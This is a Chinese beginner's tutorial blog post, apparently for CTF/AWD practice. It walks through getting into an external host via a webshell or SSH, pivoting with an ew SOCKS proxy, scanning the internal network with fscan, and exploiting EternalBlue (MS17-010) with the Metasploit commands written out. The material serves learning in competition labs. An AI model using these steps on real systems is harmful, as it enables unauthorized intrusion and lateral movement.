初识渗透

我们如果需要打进内网的机子,则需要先在外网的机子上搭建代理才能访问内网机子

利用漏洞,打进外网

如果是ssh直接连接的话就是最简单的了

连接建议使用tabby,够简单轮椅。(可以看我的那篇awd初体验 | MetaVi

如果是别的的话我们需要先利用web知识打进外网

如:利用thinkphp漏洞传上木马再蚁剑连接

搭建代理,连接内网

外网的机子我们连接上shell后,我们需要把ew(GitHub - idlefire/ew: 内网穿透(跨平台))安装到这个外网机子上,安装的时候最好把fscan也装上。

(如果是ssh连接的话,这里就展示出tabby的优势之处了——sftp可以直接拖拽上传。当然蚁剑也可以拖拽上传)

安装好之后就可以搭建代理服务了

1
2
3
4
5
6
chmod +x ew_for_linux64 
# 要先加一个可执行权限
./ew_for_linux64 -s ssocksd -l 22222
# 22222是端口,建议开大一点,两万以上
netstat -tunlp
# 这个命令可以看有那些端口在开着
屏幕截图 2025-07-02 104522

显示这个:ssocksd 0.0.0.0:22222 <--[10000 usec]--> socks server就表示成功了

之后我们需要proxifier设置好,这个网上教程还是很多的

屏幕截图 2025-07-02 104808

设置好之后就可以访问内网了,怎么鉴别是否成功,我们直接在浏览器上访问内网看能否访问就行。

(有些连接上之后就不能再访问网站了如chatgpt,csdn等等,我们想访问的时候就要先断开proxifier。)

那我们怎么知道有那些内网呢?

自然是fscan扫一下了

扫完之后就能给你报有那些内网机子,然后给就可以打了。

永恒之蓝漏洞

一个很著名的漏洞

我们要先配置好msf(Nightly Installers | Metasploit Documentation Penetration Testing Software, Pen Testing Security

下载windows版本的(kali自带一个msf)

下载后记得手动添加环境变量

运行

1
msfconsole

成功之后长这样(图案每次随机生成)

屏幕截图 2025-07-02 180609

然后我们就可以选择漏洞类型了

1
2
3
4
search ms17_010
#搜索ms17_010相关的漏洞
use exploit/windows/smb/ms17_010_eternalblue
#漏洞类型,或者搜索完之后直接use 1/2/3

然后我们需要填远程ip

1
set RHOST ip地址

然后直接

1
2
3
run
或者
exploit

如果还是不行的话我们

1
show options

看看有什么没填。

1
2
set payload windows/x64/meterpreter/bind_tcp_uuid
#设置正向代理

run完成功后就显示win

win之后我们就能拿到权限了,查找flag。